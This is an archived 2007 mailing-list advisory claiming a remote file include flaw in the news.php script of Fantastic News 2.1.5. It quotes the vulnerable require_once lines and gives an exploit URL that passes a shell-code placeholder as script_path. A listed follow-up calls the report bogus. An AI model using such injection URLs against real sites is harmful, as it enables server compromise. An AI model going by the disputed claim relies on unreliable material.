[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Fantastic News <=- (news.php) Remote File Include Vulnerability

To: submit@xxxxxxxxxxx
Subject: Fantastic News <=- (news.php) Remote File Include Vulnerability
From: "me you" <r.5.7@xxxxxxxxxxx>
Date: Sun, 21 Jan 2007 12:42:55 +0000

#######################################################

Fantastic News <=- (news.php) Remote File Include Vulnerability ...

Script: Fantastic News

Version: 2.1.5

URL : http://fscripts.com/download.php?file=1

Author: BorN To K!LL

#######################################################

Bug in :.  news.php

code :
require_once($CONFIG['script_path']."functions/functions.php");
require_once($CONFIG['script_path']."functions/mysql.php");
require_once($CONFIG['script_path']."functions/template.php");

#######################################################

Explo!t :.
/news.php?CONFIG['script_path']=[SHe1L-Code]

#######################################################

GreeTz to :.

Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke ,ThE-LoRd-Of-CrAcKiNg .....


#######################################################

_________________________________________________________________

FREE pop-up blocking with the new MSN Toolbar - get it now!http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Follow-Ups:
- Re: Fantastic News <=- (news.php) Remote File Include Vulnerability <- bogus... again
  - From: Mailinglists Address

Prev by Date: Full Path Disclosure in Open-Realty ( v2.3.4 )
Next by Date: Check Point Connectra End Point security bypass
Previous by thread: Full Path Disclosure in Open-Realty ( v2.3.4 )
Next by thread: Re: Fantastic News <=- (news.php) Remote File Include Vulnerability <- bogus... again
Index(es):
- Date
- Thread